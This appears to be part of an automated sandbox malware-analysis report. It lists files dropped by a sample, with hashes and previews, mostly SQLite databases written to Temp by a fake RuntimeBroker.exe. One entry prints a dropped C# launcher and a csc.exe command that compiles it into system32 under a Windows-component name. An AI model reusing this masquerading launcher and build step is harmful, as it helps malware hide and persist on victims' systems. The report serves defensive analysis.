                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\aZN0cZdlGX

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\ao3U2JcQ2r

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\aptb1P86Jm

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\b8b3jFQdad

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\bLIjAL2CHC

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\bRj2zhpUnc

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\bZmkMsPMuF

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\baAXtHnJu8

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\bo2V6UOlUV

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\cBTkJEcny2

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\cJbHqVw7Nd

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\cmP8vP8RjQ

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\d135vvi0\d135vvi0.0.cs

                                                                                  Download File
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                  Category:dropped
                                                                                  Size (bytes):393
                                                                                  Entropy (8bit):4.942776197794233
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLu5j3iFkD:JNVQIbSfhV7TiFkMSfh0jSFkD
                                                                                  MD5:D5FCFE96B53454B1FBFC3C4DD9B68131
                                                                                  SHA1:7E5BF2C3B9A3FA3AB85F8C1D80DBAEA18D9BBBC0
                                                                                  SHA-256:2F65467D61A402D4769F951F47E669B6AE9826C991897C889BB9095D9F4714DA
                                                                                  SHA-512:2E6D9E9AEBFF97B1D5AA38E199B65D576BA7F7314F9F56DA12571F78EEA42C3D18D4DE84EC09B563DCA12F5EBFFB248C7C3F964C785457E42E398A8190E81898
                                                                                  Malicious:false
                                                                                  Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Windows\LiveKernelReports\RuntimeBroker.exe"); } catch { } }).Start();. }.}.

                                                                                  C:\Users\user\AppData\Local\Temp\d135vvi0\d135vvi0.cmdline

                                                                                  Download File
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):253
                                                                                  Entropy (8bit):5.120081153147471
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8oN723fBBVb:Hu7L//TRq79cQnaprb
                                                                                  MD5:4186E5C699D9ADFE6A224B79E99849B2
                                                                                  SHA1:D0436E12D1853164B7F38134880A1CD6EFE5CC97
                                                                                  SHA-256:AFDB89002F820D9106C922929B0A9F5CD92895CB707E9B5A6D6B28BED5810346
                                                                                  SHA-512:47EE6AA0B5C6E7704723D06E544BE4EEDFFB0DE1F0E956B319AA61EF53B24C2549C17C3AEE2B04211CE3EF62A3B721672BB0E8D992A12E9ED0E399FBF0917AC7
                                                                                  Malicious:false
                                                                                  Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\d135vvi0\d135vvi0.0.cs"

                                                                                  C:\Users\user\AppData\Local\Temp\d135vvi0\d135vvi0.out

                                                                                  Download File
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (335), with CRLF, CR line terminators
                                                                                  Category:modified
                                                                                  Size (bytes):756
                                                                                  Entropy (8bit):5.26091957917823
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:B2MBoMI/u7L//TRq79cQnapraKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:wMjI/un/Vq79tnapraKax5DqBVKVrdFf
                                                                                  MD5:58BE106DD96337A2B2537A2076AD2572
                                                                                  SHA1:D74A827B1086780EE24544213D5BE65C9E532851
                                                                                  SHA-256:34B0C29DD4E11F0C4EAD199FAEC1E970D8F948AF1F7E3972F731AF310312287A
                                                                                  SHA-512:4B3A32756F464FC695E35A32DF831D407530C73576A927390C4FA701C3C04DE24D2AFA14D8BEE71BB4666DEDD7D2200AD5D0EE404AFD417641D61ACDA7E60415
                                                                                  Malicious:false
                                                                                  Preview:.C:\ServerWinRuntimeBroker> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\d135vvi0\d135vvi0.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                  C:\Users\user\AppData\Local\Temp\dBG31pxIKN

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\dMqXkQ2jeb

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\de3RQno5mm

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\eiaajrfg6o

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\ezaGvp12YM

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\f8waMqyhGu

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\fpyEEbdJ6M

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
